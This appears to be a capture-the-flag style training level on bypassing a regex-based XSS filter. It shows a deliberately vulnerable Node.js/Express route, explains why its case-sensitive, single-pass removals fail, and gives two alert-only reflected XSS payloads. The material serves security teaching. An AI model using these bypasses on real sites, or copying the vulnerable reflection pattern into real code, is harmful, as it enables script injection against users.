Level 1: Filter Evasion
MISSION: Bypass the server-side regex filter.
/// SOURCE CODE INSPECTOR ///
// Backend Node.js / Express route (deliberately vulnerable; the filter is kept exactly as written)
const express = require('express');
const app = express();

app.get('/level1', (req, res) => {
  // Coerce to a string so a request with no ?payload= does not throw inside replace()
  let payload = String(req.query.payload ?? '');
  // Developer's attempt at a custom WAF: two literal, case-sensitive, single-pass string removals
  payload = payload.replace(/<script>/g, '');
  payload = payload.replace(/onerror=/g, '');
  // Reflected into the HTML response body without any encoding
  res.send("<div id='output'>" + payload + "</div>");
});

app.listen(3000);
/// DECRYPTION COMPLETE ///
The filter does only what its two literal regexes say. /<script>/g has no i flag, so it removes the exact lowercase string <script> and nothing else; /onerror=/g removes that one attribute name only when the = follows it with no whitespace. HTML tag and attribute names are case-insensitive, attributes may have spaces around =, and onerror is just one of many event handlers, so both checks are trivially bypassed. Each replace also runs a single pass, so a string that re-forms the banned token once the inner copy is removed (for example <scr<script>ipt>) comes out as <script>. Whatever survives is concatenated straight into the response body and parsed by the browser as HTML.
Payload 1 (Case Evasion):
<ScRiPt>alert(1)</ScRiPt>
Payload 2 (Alternate Event Handler):
<svg onload=alert(1)>